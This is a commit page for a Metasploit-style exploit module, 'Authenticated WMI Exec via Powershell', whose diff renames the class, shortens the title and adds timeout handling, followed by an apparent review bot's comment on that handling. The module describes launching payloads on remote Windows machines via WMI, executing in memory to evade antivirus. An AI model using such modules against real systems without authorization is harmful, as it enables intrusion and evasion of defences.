
Commit e1ff37f

committed
Title change and handling Rex::TimeoutError exception
1 parent 7b83720 commit e1ff37f


1 file changed

+17
-11
lines changed

1 file changed

+17
-11
lines changed

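--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -1,20 +1,15 @@
-# -*- coding: binary -*-
-
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-##
-# Ideally the methods to create WMI wrapper functions and their callers
-# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
-##
 
 require 'msf/core'
 require 'msf/core/post/windows/powershell'
 require 'msf/core/post/windows/priv'
+require 'msf/core/exploit/powershell/dot_net'
 
-class Metasploit3 < Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
 Rank = ExcellentRanking
 
 include Msf::Post::Windows::Powershell
@@ -23,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
 
 def initialize(info={})
 super(update_info(info,
-'Name' => "Authenticated WMI Exec via Powershell (Local Exploit)",
+'Name' => "Authenticated WMI Exec via Powershell",
 'Description' => %q{
 This module uses WMI execution to launch a payload instance on a remote machine.
 In order to avoid AV detection, all execution is performed in memory via psh-net
@@ -117,7 +112,6 @@ def build_script
 end
 
 def exploit
-
 # Make sure we meet the requirements before running the script
 unless have_powershell?
 fail_with(Failure::BadConfig, 'PowerShell not found')
@@ -137,7 +131,13 @@ def exploit
 return
 end
 
-print_good("#{datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)}")
+begin
+psh_output = datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)
+print_good(psh_output)
+rescue Rex::TimeoutError => e
+elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+end
+
 vprint_good('PSH WMI exec is complete.')
 end
 
@@ -176,7 +176,13 @@ def ps_wmi_exec(opts = {})
 
 EOS
 
-return ps_wrapper
+return ps_wrapper
 end
 
 end
+
+
+#
+# Ideally the methods to create WMI wrapper functions and their callers
+# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
+#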
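Review bot: In the new `rescue Rex::TimeoutError => e` branch of `exploit`, the timeout is recorded only in the framework log through `elog`, and control then falls through to `vprint_good('PSH WMI exec is complete.')`, so a run that timed out is still reported on the console as complete. Surface the condition in the rescue with something like `print_warning("PSH WMI exec timed out: #{e.message}")`, and move the `vprint_good` line inside the `begin`, after `print_good(psh_output)`, so it prints only when the call returned. Separately, `print_good(psh_output)` now receives the raw return value instead of an interpolated string; whether `psh_exec` can return nil is not visible on this page, so a guard may be worth adding. The body of `exploit` begins and continues outside the hunks shown.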
